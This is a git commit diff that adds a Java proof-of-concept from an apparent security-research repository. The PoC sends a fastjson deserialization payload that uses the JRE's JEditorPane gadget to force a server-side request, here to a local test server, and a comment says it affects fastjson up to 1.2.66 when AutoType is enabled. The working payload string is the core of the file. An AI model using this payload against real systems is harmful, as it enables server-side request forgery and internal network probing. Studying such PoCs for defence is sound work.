Merge branch 'feat/fastjson-gadget-ssrf-jre-jeditorpane'

“threedr3am” · “threedr3am” · commit 02a3d639a3a6 · 2020-03-03T23:08:03.000+08:00
diff --git a/fastjson/src/main/java/com/threedr3am/bug/fastjson/JREJeditorPaneSSRFPoc.java b/fastjson/src/main/java/com/threedr3am/bug/fastjson/JREJeditorPaneSSRFPoc.java
@@ -0,0 +1,28 @@
+package com.threedr3am.bug.fastjson;
+
+import com.alibaba.fastjson.JSON;
+import com.alibaba.fastjson.parser.ParserConfig;
+import com.threedr3am.bug.common.server.HTTPServer;
+
+/**
+ * fastjson <= 1.2.66 RCE，需要开启AutoType（JRE自带依赖）
+ *
+ * @author threedr3am
+ */
+public class JREJeditorPaneSSRFPoc {
+
+  static {
+    HTTPServer.PORT = 23234;
+    HTTPServer.run(null);
+  }
+
+  public static void main(String[] args) {
+    ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
+    String payload = "{\"@type\":\"javax.swing.JEditorPane\",\"page\": \"http://127.0.0.1:23234?a=1&b=22222\"}";
+    try {
+      JSON.parse(payload);
+    } catch (Exception e) {
+      e.printStackTrace();
+    }
+  }
+}
